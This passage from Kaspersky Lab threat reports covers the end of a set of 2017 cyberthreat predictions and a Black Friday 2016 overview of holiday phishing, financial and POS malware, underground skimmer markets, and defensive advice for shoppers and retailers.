Shame: Shame and extortion have continued to great fanfare as strategic and indiscriminate dumps have caused personal, reputational, and political problems left and right. We must admit that the scale and victims of some of these leaks have been genuinely astonishing to us.

What does 2017 have in store? Those dreaded APTs The rise of bespoke and passive implants

As hard as it is to get companies and large-scale enterprises to adopt protective measures, we also need to admit when these measures start to wear thin, fray, or fail. Indicators of Compromise (IoCs) are a great way to share traits of already known malware, such as hashes, domains, or execution traits that will allow defenders to recognize an active infection. However, the trendsetting one-percenters of the cyberespionage game have known to defend against these generalized measures, as showcased by the recent ProjectSauron APT, a truly bespoke malware platform whose every feature was altered to fit each victim and thus would not serve to help defenders detect any other infections. That is not to say that defenders are entirely without recourse but it’s time to push for the wider adoption of good Yara rules that allow us to both scan far-and-wide across an enterprise, inspect and identify traits in binaries at rest, and scan memory for fragments of known attacks.

Forecast for 2017: passive implants showing almost no signs of infection come into fashion

Tweet

ProjectSauron also showcased another sophisticated trait we expect to see on the rise, that of the ‘passive implant’. A network-driven backdoor, present in memory or as a backdoored driver in an internet gateway or internet-facing server, silently awaiting magic bytes to awaken its functionality. Until woken by its masters, passive implants will present little or no outward indication of an active infection, and are thus least likely to be found by anyone except the most paranoid of defenders, or as part of a wider incident response scenario. Keep in mind that these implants have no predefined command-and-control infrastructure to correlate and provide a more anonymous beachhead. Thus, this is the tool of choice for the most cautious attackers, who must ensure a way into a target network at a moment’s notice.

Ephemeral infections

While adoption of PowerShell has risen as a dream tool for Windows administrators, it has also proven fruitful ground for the gamut of malware developers looking for stealthy deployment, lateral movement, and reconnaissance capabilities unlikely to be logged by standard configurations. Tiny PowerShell malware stored in memory or in the registry is likely to have a field day on modern Windows systems. Taking this further, we expect to see ephemeral infections: memory-resident malware intended for general reconnaissance and credential collection with no interest in persistence. In highly sensitive environments, stealthy attackers may be satisfied to operate until a reboot wipes their infection from memory if it means avoiding all suspicion or potential operational loss from the discovery of their malware by defenders and researchers. Ephemeral infections will highlight the need for proactive and sophisticated heuristics in advanced anti-malware solutions (see: System Watcher).

Espionage goes mobile

Multiple threat actors have employed mobile implants in the past, including Sofacy, RedOctober and CloudAtlas, as well as customers of HackingTeam and the suspected NSO Pegasus iOS malware suite. However, these have supplemented campaigns largely based on desktop toolkits. As adoption of Desktop OS’s suffers from a lack of enthusiasm, and as more of the average user’s digital life is effectively transferred to their pockets, we expect to see the rise of primarily mobile espionage campaigns. These will surely benefit from decreased attention and the difficulty of attaining forensic tools for the latest mobile operating systems. Confidence in codesigning and integrity checks has stagnated visibility for security researchers in the mobile arena, but this won’t dissuade determined and well-resourced attackers from hunting their targets in this space.

The future of financial attacks We heard you’d like to rob a bank…

The announcement of this year’s attacks on the SWIFT network caused uproar throughout the financial services industry due to its sheer daring; measured in zeros and commas to the tune of multi-million dollar heists. This move was a natural evolution for players like the Carbanak gang and perhaps other interesting threat actors. However, these cases remain the work of APT-style actors with a certain panache and established capability. Surely, they’re not the only ones interested in robbing a bank for sizable funds?

Forecast for 2017: growing popularity of short-lived infections, including those using PowerShell

Tweet

As cybercriminal interest grows, we expect to see the rise of the SWIFT-heist middlemen in the well-established underground scheme of tiered criminal enterprises. Performing one of these heists requires initial access, specialized software, patience, and, eventually, a money laundering scheme. Each of these steps has a place for already established criminals to provide their services at a fee, with the missing piece being the specialized malware for performing SWIFT attacks. We expect to see the commodification of these attacks through specialized resources being offered for sale in underground forums or through as-a-service schemes.

Resilient payment systems

As payment systems became increasingly popular and widely adopted, we expected to see greater criminal interest in these. However, it appears that implementations have proven particularly resilient, and no major attacks have been noted at this time. This relief for the consumer may, however, entail a headache for the payment system providers themselves, as cybercriminals are wont to target the latter through direct attacks on the payment system infrastructure. Whether these attacks will result in direct financial losses or simply outages and disruption, we expect increased adoption to attract more nefarious attention.

Dirty, lying ransomware

As much as we all hate ransomware (and with good reason), most ransomware thrives on the benefit of an unlikely trust relationship between the victim and their attacker. This criminal ecosystem relies on the tenet that the attacker will abide by a tacit contract with the victim that, once payment is received, the ransomed files will be returned. Cybercriminals have exhibited a surprising semblance of professionalism in fulfilling this promise and this has allowed the ecosystem to thrive. However, as the popularity continues to rise and a lesser grade of criminal decides to enter the space, we are likely to encounter more and more ‘ransomware’ that lacks the quality assurance or general coding capability to actually uphold this promise.

We expect ‘skiddie’ ransomware to lock away files or system access or simply delete the files, trick the victim into paying the ransom, and provide nothing in return. At that point, little will distinguish ransomware from wiping attacks and we expect the ransomware ecosystem to feel the effects of a ‘crisis of confidence’. This may not deter larger, more professional outfits from continuing their extortion campaigns, but it may galvanize forces against the rising ransomware epidemic into abandoning hope for the idea that ‘just pay the ransom’ is viable advice for victims.

The big red button

The famous Stuxnet may have opened a Pandora’s Box by realizing the potential for targeting industrial systems, but it was carefully designed with a watchful eye towards prolonged sabotage on very specific targets. Even as the infection spread globally, checks on the payload limited collateral damage and no industrial Armageddon came to pass. Since then, however, any rumor or reporting of an industrial accident or unexplained explosion will serve as a peg to pin a cyber-sabotage theory on.

Forecast for 2017: espionage increasingly shifting to mobile platforms

Tweet

That said, a cyber-sabotage induced industrial accident is certainly not beyond the realm of possibility. As critical infrastructure and manufacturing systems continue to remain connected to the internet, often with little or no protection, these tantalizing targets are bound to whet the appetite of well-resourced attackers looking to cause mayhem. It’s important to note that, alarmism aside, these attacks are likely to require certain skills and intent. An unfolding cyber-sabotage attack is likely to come hand-in-hand with rising geopolitical tensions and well-established threat actors intent on targeted destruction or the disruption of essential services.

The overcrowded internet bites back A brick by any other name

Long have we prophesied that the weak security of the Internet of Things (or Threats) will come back to bite us, and behold, the day is here. As the Mirai botnet showcased recently, weak security in needlessly internet-enabled devices provides an opportunity for miscreants to cause mayhem with little or no accountability. While this is no surprise to the infosec-aficionados, the next step may prove particularly interesting, as we predict vigilante hackers may take matters into their own hands.

Forecast for 2017: use of intermediaries in attacks against the SWIFT interbank messaging system

Tweet

The notion of patching known and reported vulnerabilities holds a certain sacrosanct stature as validation for the hard (and often uncompensated) work of security researchers. As IoT-device manufacturers continue to pump out unsecured devices that cause wide-scale problems, vigilante hackers are likely to take matters into their own hands. And what better way than to return the headache to the manufacturers themselves by mass bricking these vulnerable devices? As IoT botnets continue to cause DDoS and spam distribution headaches, the ecosystem’s immune response may very well take to disabling these devices altogether, to the chagrin of consumers and manufacturers alike. The Internet of Bricks may very well be upon us.

The silent blinky boxes

The shocking release of the ShadowBrokers dump included a wealth of working exploits for multiple, major manufacturers’ firewalls. Reports of exploitation in-the-wild followed not long after as the manufacturers scrambled to understand the vulnerabilities exploited and issue patches. However, the extent of the fallout has yet to be accounted for. What were attackers able to gain with these exploits on hand? What sort of implants may lie dormant in vulnerable devices?

Looking beyond these particular exploits (and keeping in mind the late 2015 discovery of a backdoor in Juniper’s ScreenOS), there’s a larger issue of device integrity that bears further research when it comes to appliances critical to enterprise perimeters. The open question remains, ‘who’s your firewall working for?’

Who the hell are you?

The topic of False Flags and PsyOps are a particular favorite of ours and to no surprise, we foresee the expansion of several trends in that vein…

Information warfare

The creation of fake outlets for targeted dumps and extortion was pioneered by threat actors like Lazarus and Sofacy. After their somewhat successful and highly notorious use in the past few months, we expect information warfare operations to increase in popularity for the sake of opinion manipulation and overall chaos around popular processes. Threat actors interested in dumping hacked data have little to lose from crafting a narrative through an established or fabricated hacktivist group; diverting attention from the attack itself to the contents of their revelations.

Forecast for 2017: ‘script kiddie’ extortionists compromise the idea of paying ransom to retrieve data

Tweet

The true danger at that point is not that of hacking, or the invasion of privacy, but rather that as journalists and concerned citizens become accustomed to accepting dumped data as newsworthy facts, they open the door to more cunning threat actors seeking to manipulate the outcome by means of data manipulation or omission. Vulnerability to these information warfare operations is at an all-time high and we hope discernment will prevail as the technique is adopted by more players (or by the same players with more throwaway masks).

The promise of deterrence

As cyberattacks come to play a greater role in international relations, attribution will become a central issue in determining the course of geopolitical overtures. Governmental institutions have some difficult deliberating ahead to determine what standard of attribution will prove enough for demarches or public indictments. As precise attribution is almost impossible with the fragmented visibility of different public and private institutions, it may be the case that ‘loose attribution’ will be considered good enough for these. While advising extreme caution is important, we must also keep in mind that there is a very real need for consequences to enter the space of cyberattacks. Our bigger issue is making sure that retaliation doesn’t engender further problems as cunning threat actors outsmart those seeking to do attribution in the first place. We must also keep in mind that as retaliation and consequences become more likely, we’ll see the abuse of open-source and commercial malware begin to increase sharply, with tools like Cobalt Strike and Metasploit providing a cover of plausible deniability that doesn’t exist with closed-source proprietary malware.

Doubling-down on False Flags

While the examples reported in the False Flags report included in-the-wild cases of APTs employing false flag elements, no true pure false flag operation has been witnessed at this time. By that we mean an operation by Threat Actor-A carefully and entirely crafted in the style and with the resources of another, ‘Threat Actor-B’, with the intent of inciting tertiary retaliation by the victim against the blameless Threat Actor-B. While it’s entirely possible that researchers have simply not caught onto this already happening, these sorts of operations won’t make sense until retribution for cyberattacks becomes a de facto effect. As retaliation (be it overtures, sanctions, or retaliatory CNE) becomes more common and impulsive, expect true false flag operations to enter the picture.

Forecast for 2017: lack of security for the Internet of Things will turn it into an ‘Internet of Bricks’

Tweet

As this becomes the case, we can expect false flags to be worth even greater investment, perhaps even inciting the dumping of infrastructure or even jealously guarded proprietary toolkits for mass use. In this way, cunning threat actors may cause a momentary overwhelming confusion of researchers and defenders alike, as script kiddies, hacktivists, and cybercriminals are suddenly capable of operating with the proprietary tools of an advanced threat actor, thus providing a cover of anonymity in a mass of attacks and partially crippling the attribution capabilities of an enforcing body.

What privacy? Pulling the veil

There’s great value to be found in removing what vestiges of anonymity remain in cyberspace, whether for the sake of advertisers or spies. For the former, tracking with persistent cookies has proven a valuable technique. This is likely to expand further and be combined with widgets and other innocuous additions to common websites that allow companies to track individual users as they make their way beyond their particular domains, and thus compile a cohesive view of their browsing habits (more on this below).

Forecast for 2017: the question “Who is your firewall working for?” will become increasingly relevant

Tweet

In other parts of the world, the targeting of activists and tracking of social media activities that ‘incite instability’ will continue to inspire surprising sophistication, as deep pockets continue to stumble into curiously well-placed, unheard of companies with novelties for tracking dissidents and activists through the depth and breadth of the internet. These activities tend to have a great interest in the social networking tendencies of entire geographic regions and how they’re affected by dissident voices. Perhaps we’ll even see an actor so daring as to break into a social network for a goldmine of PII and incriminating information.

The espionage ad network

No pervasive technology is more capable of enabling truly targeted attacks than ad networks. Their placement is already entirely financially motivated and there is little or no regulation, as evidenced by recurring malvertising attacks on major sites. By their very nature, ad networks provide excellent target profiling through a combination of IPs, browser fingerprinting, and browsing interest and login selectivity. This kind of user data allows a discriminate attacker to selectively inject or redirect specific victims to their payloads and thus largely avoid collateral infections and the persistent availability of payloads that tend to pique the interest of security researchers. As such, we expect the most advanced cyberespionage actors to find the creation or co-opting of an ad network to be a small investment for sizable operational returns, hitting their targets while protecting their latest toolkits.

Forecast for 2017: rapid evolution of false-flag cybercriminal operations

Tweet

The rise of the vigilante hacker

Following his indiscriminate release of the HackingTeam dump in 2015, the mysterious Phineas Fisher released his guide for aspiring hackers to take down unjust organizations and shady companies. This speaks to a latent sentiment that the asymmetrical power of the vigilante hacker is a force for good, despite the fact that the HackingTeam dump provided live zero-days to active APT teams and perhaps even encouragement for new and eager customers. As the conspiratorial rhetoric increases around this election cycle, fuelled by the belief that data leaks and dumps are the way to tip the balance of information asymmetry, more will enter the space of vigilante hacking for data dumps and orchestrated leaks against vulnerable organizations.

Forecast for 2017: cybercriminals increasingly turn to social and advertising networks for espionage

Tweet

Kaspersky Lab Black Friday Threat Overview 2016

Malware Alerts - Mon, 11/14/2016 - 03:57

 Download the PDF

Introduction

The Internet has changed forever how people shop. By 2018, around one in five of the world’s population will shop online; with ever more people doing so on a mobile device rather than a computer. In fact, it is estimated that by the end of 2017, 60% of e-commerce will come from smartphones. That’s millions of people enthusiastically browsing and buying while at home, at work, in restaurants, airports, and railway stations, walking down the street, standing in stores, and on holiday, often outside the protective reach of a secure, private wireless network.

Regardless of the device used, every interaction and transaction will generate a cloud of data that brands will want to capture in order to deliver ever more targeted and personalized offers. Unfortunately, others are waiting to seize consumers’ information too – through insecure public Wi-Fi networks, phishing emails and infected websites, among others. They are the cybercriminals, and they don’t have a consumer’s or even a brand’s best interests at heart.

The risks facing retailers and online shoppers peak during the busiest shopping days of the year: the late November Thanksgiving weekend that runs from Black Friday through to Cyber Monday, and all through December to Christmas and the New Year.

As the number and speed of transactions increase, so do the cyberthreats. In this overview, Kaspersky Lab reveals the reality in terms of the top cyber-attacks targeting consumers and retailers during this remarkable buying period.

To put this data in context, it is worth looking back over the last few years to see how the landscape has evolved, focusing in particular on Black Friday and Cyber Monday.

In 2013, the concepts of Black Friday and Cyber Monday were already well established in North America and starting to gain momentum elsewhere. In the US alone, Cyber Monday saw online sales grow by 21% on 2012, raking in sales of $2.27 billion. Black Friday achieved $1.93 billion worth of transactions, but won out on average sales value. 17% of total sales were undertaken on mobile – a 55% increase on 2012. In the UK, online sales rose by a slightly more modest 16% in November, with over $600 million believed to have been spent online on Cyber Monday alone.

This was also the year when US retailer Target discovered that the credit card details of around 40 million customers were breached between 27 November and 15 December, apparently through hacked in-store point-of-sale systems.

In 2014, the year of the now infamous Sony Entertainment hack, the records set in 2013 were all broken. Thanksgiving Day 2014 in the US marked the moment when more mobile devices (52%) than computers were used (48%) for browsing online; and Black Friday online sales were up 21% compared to the same day in 2013 – with around one in three (30%) orders placed using a mobile device. Adobe estimates overall online sales in the US of $2.4 billion on Black Friday, $1.3 billion on Thanksgiving Day and $2.7 billion on Cyber-Monday. In the UK, online sales peaked during the week of Black Friday sales surged by 44%, compared to the previous week, and up a staggering 135% on the same week in 2013. Mobile sales rose by 83%.

And the records were all broken again in 2015. In the US, Cyber Monday 2015 was the largest online sales day, ever. Online consumers spent a record $3.07 billion – and $8.03 billion across the four-day Thanksgiving weekend. IBM analysis shows that, overall, online sales were up by a quarter (26%) on 2014, with 40% of sales now coming from mobile devices.

The big consumer hacks of the season involved malware targeting point-of-sales systems in hotels, including Hyatt, Starwood and Hilton worldwide.

2016 looks set to break records all over again, and criminals will probably try even harder to take advantage of all the noise and activity to steal credentials to financial accounts or even to grab the money directly. This overview will cover the types of cyberthreats that buyers, sellers and providers of payment systems may face over the coming weeks.

Methodology and Key Findings

The overview is based on information gathered from Kaspersky Lab malware and phishing detection systems (number of attacks or number of attacked users), and also from the analysis of events and conversations happening on the hacker underground – multiple internet forums where users allegedly involved in financial fraud operations tend to gather. The overview covers Q4 in 2013, 2014, 2015 and partly (in some cases) 2016. Even though, officially, the “Black Friday” sales period ends with Cyber Monday, right after the Thanksgiving holidays, just a few days later another “high” sales period begins: the so-called pre-Christmas period, which is also one of the most profitable times of the year for retailers. We count October as a high sales period as well, because so-called “Black Friday” sales campaigns often start prior to the actual sales days (Halloween sales are a good example), and – what is more important – cybercriminals tend to start preparations in advance of day X.

The overview also contains a list of actions that could be implemented by regular users, business owners and owners of payment infrastructure in order to prevent fraud during the high retail season.

Key Findings:
  • The share of financial phishing during the high sales season is 9 percentage points higher than during other times of the year.
  • The share of phishing attacks against online shops and payment systems during the period is usually higher than phishing against banks.
  • Criminals are trying to connect their malicious campaigns, such as spreading financial malware and phishing pages, to particular dates: Black Friday, Cyber Monday, and the pre- and post-Christmas days.
  • Kaspersky Lab’s virus collection now counts 36 families of POS malware, 6 of which were added in 2016. The number of Banking malware families, in contrast, is only 30.
  • Underground vendors of skimmers and dummy plastic cards are already experiencing an increase in sales. In December 2015 the sales of skimmers rose more than tenfold: from the regular 25-30 devices to 500.
  • Kaspersky Lab researchers expect blackmailing DDoS-attacks against online retailers during the holidays.

More about these findings can be found in the overview.

Phishing

Among cybercriminals, phishing is one of the most popular ways to steal payment card details and credentials to online banking accounts. A phishing scheme is relatively easy to set up (the fraudster doesn’t even need to know how to write malware; only basic web development and design skills are required), yet it is effective because it is mostly based on social engineering techniques. During the holiday period, users are eager to find the best goods at the best price and they are expecting to see offers of this kind while surfing the web. Cybercriminals know about that and try to exploit this feature as much as possible.

Share of financial phishing in overall volume of attacks

As statistics from the previous years show, financial phishing usually accounts for no less than a quarter of all phishing attacks registered in a year. For example, in 2013, it was 31.45% of all registered phishing attacks, in 2014 – 28.74%, in 2015 – 34.33%. The current year is not yet over, but judging by the quarterly statistics the trend is the same.

Share of financial phishing in overall number of phishing attacks 2013 – 2016

And at the same time things are significantly different when it comes to what we call the holiday sales period. As expected, the share of financial phishing at this time is noticeably higher than the typical yearly result.

Share of financial phishing in different periods in comparison to the holiday period

Although in 2013 the number of financial phishing attacks during the high sales period was only 0.5 percentage points higher than the total result for the same year, in 2014 and 2015 we detected a clear difference of around 9 p.p. in favour of attacks during the holidays. Of course these data are not enough to talk about a strong tendency; nevertheless, the chances are high that this year this difference will emerge again.

Types of financial phishing

At Kaspersky Lab we distinguish between three major types of financial phishing: Banking, E-payment and E-shopping. They are all types of phishing pages that imitate the corresponding legitimate services dealing with financial transactions. Based on what we have observed in Q4 in 2014 and 2015, during the “Holiday” period, the separation between different types of financial phishing is different to the result for the full year.

For example, in 2013, shares of phishing attacks during the year and during the last “Holiday” quarter weren’t very different – less than 1 percentage point. However inside the category differences were much more visible.

That year the share of e-shop phishing in Q4 increased more than 1 percentage point to 7.8%. And the share of phishing against users of popular payment systems more than doubled compared to the rest of the year – 5.46% against 2.74%. At the same time, the share of phishing against users of online banking was lower than during the year: 18.76% against 22.2%.

The situation was repeated the next year, but with more visible amplitude. Shopping phishing during the holiday season was 5.32 p.p. higher than the full year result. And the payment systems’ phishing was 2.78 p.p. higher.

2013 Full year Q4 Financial phishing total 31.45% 32.02% E-shop 6.51% 7.80% E-banks 22.20% 18.76% E-payments 2.74% 5.46% 2014 Full year Q4 Financial phishing total 28.73% 38.49% E-shop 7.32% 12.63% E-banks 16.27% 17.94% E-payments 5.14% 7.92% 2015 Full year Q4 Financial phishing total 34.33% 43.38% E-shop 9.08% 12.29% E-banks 17.45% 18.90% E-payments 7.08% 12.19%

The change in shares of different types of financial phishing in 2013-2015

These differences are accompanied by attacks against particular targets. In 2014, Kaspersky Lab researchers conducted a small investigation into the dynamics of attacks during Black Friday and discovered that the number of attempts to load phishing pages detected and blocked by users of Kaspersky Lab products was actually growing.

Here are the timeline graphs for several targets that are traditionally most often used by phishing scammers.

Dynamics of detection of attempts to load phishing page where the American Express brand is mentioned demonstrates very similar behaviour in 2014 and 2015.

Dynamics of phishing attacks using the American Express brand in the week of Black Friday 2014 2015

Example of timeline of attacks against a particular target

And when it comes to other brands connected to online money and shopping the situation is repeated. Though the growth of attacks in 2015 happened after Black Friday and peaked on Cyber Monday.

Dynamics of phishing attacks using the Visa brand on Black Friday 2014 2015

Example of timeline of attacks against a particular target

Last but not least phishing attacks that utilize online shopping brands also obviously have a connection to specific days, such as Black Friday.

Dynamics of phishing attacks using the Wal Mart brand on Black Friday 2014 2015

Example of timeline of attacks against a particular target

Example of timeline of attacks against a particular target

Spikes in the number of detections are also typical for Christmas and the New Year period – basically they’re the second highest period in the whole quarter. Further in this overview we will show that attack peaks are typical features not only for phishing, but for financial malware attacks as well.

Examples of “Holiday” Phishing

In most cases cybercriminals don’t bother themselves with inventing anything special. Instead they just copy pages of legitimate shops, internet banking and payment systems.

As can be seen on the picture below the phishing copies of the Amazon shop quite precisely resemble the original website.

Example of a fake Amazon e-shop

Which is also true for sites of payment systems and banks. Below are pictures of phishing sites imitating Visa and American Express data submission forms. Along with some others, these two brands are traditionally among the top of those faked by phishers.

Example of a fake Visa payment form

Example of a fake American Express payment form

Sometimes criminals create whole fake web-shops simply to collect victims’ credit card data.

Example of 100% fake internet shop

They attract victims with extremely low prices for goods from famous brands. And then – when the victim has chosen the item they like and proceeds to the payment page, they simply steal their financial credentials.

Example of 100% fake internet shop, part 2, the payment page

Another way in which criminals exploit the hot sales period is by creating allegedly legitimate websites that are selling gift cards and coupons that – if they’re real – can be monetized in legitimate internet shops. However, criminals sell phony coupons, not real. The only purpose of these websites is to collect card credentials. An example of such a website is displayed in the picture below.

Example of a fake shop selling phony coupons

And of course criminals exploit the brand of Black Friday itself and they start their preparations way in advance. While preparing this overview Kaspersky Lab researchers came across a number of fake websites, which have the word Black Friday in the name and the content of which offers outstanding discounts on expensive goods.

Example of a fake Black Friday themed shop

In all, Kaspersky Lab security specialists expect that in 2016 the trends which emerged in previous years (higher than average percent of financial phishing, topical Black Friday scams, etc.) will continue their development as phishing remains one of the main source of credit card data for criminals and is still one of the easiest ways to set up a fraud scheme.

Financial malware

For years, banking trojans were one of the most dangerous cyberthreats out there. Unlike usual spyware which hunts for any type of credentials and, in most cases, is not very sophisticated, banking trojans are aimed specifically at users of internet banking and remote banking systems. Criminals tend to invest a lot of resources in the development of such malware and also develop different sophisticated techniques to avoid detection by AV products, and spread the malware as effective as possible. The most famous examples of banking malware are: ZeuS, SpyEye, Carberp, Citadel, Emotet, Lurk and others.

In previous years Kaspersky Lab experts have prepared two reports covering the global financial malware landscape, in 2013 and in 2014. And since then multiple things have changed: first of all the number of users attacked with banking malware has started to decrease. Most likely this is due to the fact that criminals have largely switched their attention from clients of banks to the banks themselves, because a sophisticated attack against a bank can bring much more profit than an attack against a regular user. Another reason is the rise of encryption ransomware which has proven itself a relatively effective way of getting money illegally. What hasn’t changed a lot is the attention of criminals to the high sales season.

the change in the number of attacks and attacked users from November to December 2015

According to Kaspersky Lab telemetry, during the holiday season of 2015, 261,000 users were attacked with banking malware That’s significantly less than in the same period a year ago, when 307,600 users were attacked. However, 2015 has shown the fairly obvious interest that criminals are showing in Black Friday, Cyber Monday and Christmas. In October the number was 61,674 users, in November – 81,038, and in December – 154,324 attacked users. A year before, in 2014, 101,300 users were hit in October, 164,000– in November and 102,900 in December.

The pattern is obvious.

The dynamics of attacks with help of financial malware from November 20 to December 3 2015 (Black Friday through Cyber Monday)

As can be seen on the graph above, the number of attacked users started to grow from November 22nd and peaked on November 26th, the day before the Black Friday 2015. The next visible peak happened on November 30th, which was the day of Cyber Monday that year. These two peaks were noticeably the biggest since the beginning of the period.

The dynamics of attacks with financial malware in Christmas period 2015

The next big rise in the number of attacks and attacked users happened on 24th of December, right before Christmas, followed by a huge two-day spike detected on 28th and 29th, not long before New Year’s Eve.

In 2014, the spikes of attacks in the holiday season weren’t that obvious, but still it was clear enough that the Black Friday period is of interest: a visible rise in attacks started on November 24th and peaked on November 27th, which was again the day before Black Friday. After that another spike was registered on 1st December, which was the day of Cyber Monday.

The dynamics of attacks with financial malware from November 20 to December 3 2015 (Black Friday through Cyber Monday)

Christmas 2014 also has shown correlation between holiday dates and attacks: on 24th and on 28th of December.

The dynamics of attacks with financial malware in the Christmas period 2014

Almost the same spikes appear when it comes to Mobile malware. Most of the detections on the graphs below were generated by a few families of malware: Faketoken, Svpeng, Marcher and Acecard. These four are the main threats when it comes to mobile banking on Android, and the criminals behind them obviously used the holidays to actively propagate these malicious programs. It was especially visible in 2014:

The dynamics of attacks with mobile financial malware on Black Friday through Cyber Monday 2014 period

2015 was significantly calmer in terms of the number of detections, but certain spikes were still in place.

The dynamics of attacks with mobile financial malware on Black Friday through Cyber Monday in 2015

POS malware

Another dangerous type of malware which we have already seen and are expecting to see during this season is POS-malware – the type of financial malware which infects the OS of point of sales terminals and then steals the credentials of the credit cards processed by these devices. So far, due to the specific nature of the devices that this type of malware tends to attack, we don’t yet have relevant statistics on the number of detections during the holiday period.

However we can estimate the threat by counting the number of families which our experts added in recent years. In 2013 only 4 families were added to our collection, but the 2013 Target breach inspired many criminals to attempt to reproduce the “success” of those who hacked the famous retailer, and the next year 12 more families of POS-malware were added. 2015 was the hottest year in terms of POS malware with 14 new families. 2016 is fairly calm so far: 6 new families were added to our collection since the beginning of the year. In total there are at least 36 families of malware capable of stealing data from POS terminals out there in the wild. The number is even bigger than the amount of banking malware families, 30 species of which are now in the Kaspersky Lab collection.

Expect new attacks

The motivation behind attacks that are tied to concrete dates are clear: cybercriminals suggest that the chances that users will be working with their financial accounts online more than usual are higher than on any other day. Therefore they tend to increase their hacking efforts to raise their own chances of stealing money. Judging by the dynamics of attacks of “holiday” dates from 2014 and 2015, Kaspersky Lab expects that in 2016, the situation may be repeated.

News from the Underground

While online shoppers are drawing up their wish-lists for the upcoming sales, retailers are preparing their stores for a massive rise in visitors, and financial infrastructure owners – banks and payment systems – are getting ready for a huge increase in the number and value of transactions, criminals are also preparing for the season. For this report Kaspersky Lab experts have conducted some research into events and discussions taking place on several secret, invitation-only underground forums, where users allegedly involved in different types of financial fraud tend to gather and discuss things.

More about Cyber Monday

Based on the results of the research, we can say that underground cybercriminals, at least on East European fora, are more excited about Cyber Monday than about Black Friday. This may be because Cyber Monday is more about online sales. There will be a lot of online advertising of special deals and it will be easier for them to hide phishing scams inside the stream of legitimate offers.

Also, from a logistics perspective, Cyber Monday is more convenient than Black Friday, which is more about offline sales. Criminals don’t have to deal with physical access to ATMs in order to set up, and later collect a skimmer. Instead they could use a phishing or malware attack in order to collect credentials and then monetize them in a number of ways.

That said, ATM skimming attacks will happen during Black Friday and will continue through other holidays: Christmas and New Year.

Example of an online advertisement for skimmers on one of the hacker forums

Based on information from the last year, during December 2015 more than 500 skimmers were sold on an East European black market, while “usual” sale rate is 25 – 30 devices per month. These devices come packed with everything necessary for successful data-stealing, like fake PIN-pads, hidden cameras etc. The vast majority (around 96.5%) of skimmers mimic the products of four popular vendors, and the rest 3.5% are skimmers that replicate custom models.

As a result of the 2015 holiday fraud campaign, criminals experienced certain problems with the cashing out of compromised cards. Based on conversations on the corresponding web resources, the cash-out projects (groups that undertake the cash-out for other criminals) were heavily overloaded so the cash-out orders took three months to complete. This was due to a large number of stolen credentials waiting to be cashed-out. According to Kaspersky Lab data, during December 2015 criminals were able to collect approximately 10 times as many credentials as during a non-holiday period. Basically this equates to the total number of card details they are usually able to steal during the rest of the year.

Example of an advertisement by an online shop selling stolen credit cards credentials

Information on several forums suggests that, in 2016, a month prior to the start of the Black Friday, vendors of skimmers were already experiencing an increase in sales, alongside vendors of blank cards that will later be used to clone stolen cards. Also, some vendors are offering new generations of POS skimmers which are attached to legitimate POS’s. Unlike earlier skimmers, the new generation is placed inside the card reader, which makes them much harder to spot with the naked eye.

Another interesting trend is that many criminals are avoiding starting their campaigns with malware, choosing instead phishing attacks because they consider them to be more efficient and safe. Besides that they are actively utilizing schemes that involve direct contact with the victim. In these attacks the fraudsters will call the victim, seemingly on behalf of a bank, and try to find out their credit card credentials with help of psychological tricks.

Kaspersky Lab experts also expect that more cases of cash-out through Apple Pay and Samsung Pay payment systems will happen during this holiday season. The recent increase in the list of countries where the systems are supported has brought a certain inspiration to criminal community. The ability to attach a card to an Apple ID and then use it to pay for real goods creates a relatively convenient way to cash-out for so called “stuffers” – criminals who specialize in cashing out through buying goods from internet and physical shops, as well as for virtual carders – criminals who monetize stolen credentials through virtual goods

Another rather interesting conclusion made by Kaspersky Lab researchers during their research of the cybercriminal underground, is that fraudsters expect a lot of profits from attacks during the holiday period, especially the pre- and post- Christmas to New Year period, not only due to the high number of buyers seeking to spend money, but also because (based on their experience, which they share on forums) in this period the anti-fraud departments of banks are weakened. Due to many employees going on vacation around these dates, banks suffer from a lack of personnel, and it is theoretically easier for criminals to hide fraudulent operations in the stream of legal ones.

Example of a fraudster’s website selling a DDoS-attack service

Other types of criminal groups – such as those specializing in DDoS attacks, will most likely try to attack online shops for the purpose of blackmailing. That is a well-known tactic which they use against small and medium retail organizations. By setting up a DDoS attack they would block access to the attacked store and, until the owner pays a ransom, they would keep it blocked. Not wanting to lose money because of the unavailability of the store the owners will often pay the criminals. This is likely to happen in the coming holiday season.

Conclusion and advice

The main purpose of this paper is to raise awareness of the threats that may ruin the upcoming holiday season for regular users and shoppers and owners of online stores and owners of financial infrastructure. Both Kaspersky Lab telemetry and the analysis of conversations happening on the underground suggest that cybercriminals will pay special attention to the upcoming high sales season. But this doesn’t mean that the holidays are already doomed.

If prepared, each legitimate party of this process: buyers, sellers and financial services providers will end up in profit. All they have to do is to follow some simple advice.

For regular users
  • Do not click on any links received from unknown people or on suspicious links sent by your friends on social networking sites or via e-mail. They can be malicious; created to download malware to your device or to lead to the phishing webpages aimed at harvesting user credentials.
  • Do not download, open or store unfamiliar files on your device, they can be malicious.
  • Do not use unreliable (public) Wi-Fi networks to make online payments, as hotspots can be easily hacked in order to listen to user traffic and to steal confidential information.
  • Do not enter your credit card details on unfamiliar or suspicious sites, to avoid passing them into cybercriminals’ hands.
  • Always double-check the webpage is genuine before entering any of your credentials or confidential information (at least take a look at the URL). Fake websites may look just like the real ones.
  • Only use sites which run with a secure connection (the address of the site should begin with HTTPS:// rather than HTTP://) to hinder theft of information transmitted.
  • Don’t tell anybody your one-time password or PIN-code, not even a bank representative. Cybercriminals can use this data to steal your money.
  • Install a security solution on your device with built-in technologies designed to prevent financial fraud. For example, Safe Money technology in Kaspersky Lab’s solutions creates secure environment for financial transactions on all levels.
  • And don’t forget about the same rules when using your mobile device for financial transactions, because cybercriminals and fraudsters target them too.
For retailers
  • Keep your e-commerce platform up-to-date. Every new update may contain critical patches to make the system less vulnerable to cybercriminals.
  • Pay attention to the personal information used for registration. Fraudsters tend to hide their identities but lack of creativity can serve as an indication of fraud. John Smith whose email address reads as 21192fjdj@xmail.com is likely to be a criminal. Check again and request more details from customers if needed. Adding captcha might be effective measure against this.
  • Restrict the number of attempted transactions. Criminals usually make multiple attempts to enter correct card numbers for one purchase. Use captcha and increased time intervals for attempts to re-enter card numbers.
  • Use two-factor authentication (Verified by Visa, MasterCard Secure Code and etc.). It will dramatically drop the number of cases of illegal card usage.
  • Be careful with suspicious orders. Several unrelated high-value items for more than $500 and extra payment for fast shipping to another country can be a sign of a criminal hurrying to resell as soon as possible. In such cases it is recommended to contact the customer on the phone and confirm the order.
  • Use tailored security solution to protect your point of sales terminals from malware attacks and make sure your POS terminals run the latest version of software.
